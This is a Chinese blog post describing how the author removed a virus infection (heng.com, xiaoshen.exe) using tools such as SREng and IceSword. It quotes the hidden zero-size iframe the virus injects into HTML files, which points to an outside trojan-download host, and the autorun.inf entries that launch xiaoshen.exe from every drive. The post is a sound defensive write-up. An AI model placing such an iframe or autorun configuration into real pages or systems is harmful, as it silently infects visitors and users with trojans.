和病毒战斗的日子(2)

heng.com使得所有htm html文件
都会在末段 添加如下代码:
<iframe src="http://qq.ee28.cn/htm/" width="0" height="0" frameborder="0"></iframe>
使得下载一些木马程序,并更改一些.exe文件关联,只能改成.com运行,我被感染时SREng的应用程序文件就只能将扩展名改成.com后才能使用

xiaoshen.exe
不能双击盘符进入,右键出现Auto选项,隐藏文件不能被显示

后台下载病毒,每次开机都出现 Trojan.InjectCode.a 病毒,感染QQ文件

用SREng扫描后出现:
Autorun.inf
[C:/]
[AutoRun]
Open=xiaoshen.exe
shellexecute=xiaoshen.exe
shell/Auto/command=xiaoshen.exe
[D:/]
[AutoRun]
Open=xiaoshen.exe
shellexecute=xiaoshen.exe
shell/Auto/command=xiaoshen.exe
[E:/]
[AutoRun]
Open=xiaoshen.exe
shellexecute=xiaoshen.exe
shell/Auto/command=xiaoshen.exe
[F:/]
[AutoRun]
Open=xiaoshen.exe
shellexecute=xiaoshen.exe
shell/Auto/command=xiaoshen.exe

出现被更改的服务:
C:/WINDOWS/System32/new.sys
[13332375 / 13332375]
<C:/WINDOWS/SYSTEM32/DRIVERS/13332375.SYS><N/A>
C:/Program Files/Common Files/Microsoft Shared/MSINFO/3CDF1368.dll>

处理方法:
修复:
New0 / New0]
</??/C:/WINDOWS/System32/new.sys><N/A>
<{F1363CDF-3CDF-1368-DF13-CDF36CDF1368}><C:/Program Files/Common Files/Microsoft Shared/MSINFO/3CDF1368.dll> [N/A]
重启,删除
C:/WINDOWS/System32/new.sys
[13332375 / 13332375]
<C:/WINDOWS/SYSTEM32/DRIVERS/13332375.SYS><N/A>
C:/Program Files/Common Files/Microsoft Shared/MSINFO/3CDF1368.dll>
显示隐藏文件,右键打开各分区,删去xiaoshen.exe Autorun.inf

xiaoshen.exe近期肆虐,让很多人为之困惑,解决步骤:
1.用SREng扫描日志
2.观察日志,查找可疑进程和服务(PS:不能确定的可以去搜索引擎查看或把日志贴到网上,如个杀毒软件的论坛里,请高手们帮忙分析)
3.结束可以进程,可以用冰刃(Icesword)结束不能结束的进程
  安全模式删除病毒文件,不能删的用Pocket KillBox干掉
  删除注册表中病毒的相关信息,在注册表中查找病毒文件的相关信息(切记删之前备份下注册表)
4.重启,升级杀毒软件杀毒(这步其实挺关键——自认为,有些我们结束了病毒插入进程的程序和注册表的程序运行关联,但有些病毒文件我们可能并没有手工删除掉,这个时候就要靠杀毒软件来帮我们清理一下这些“脏东西”)

 
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值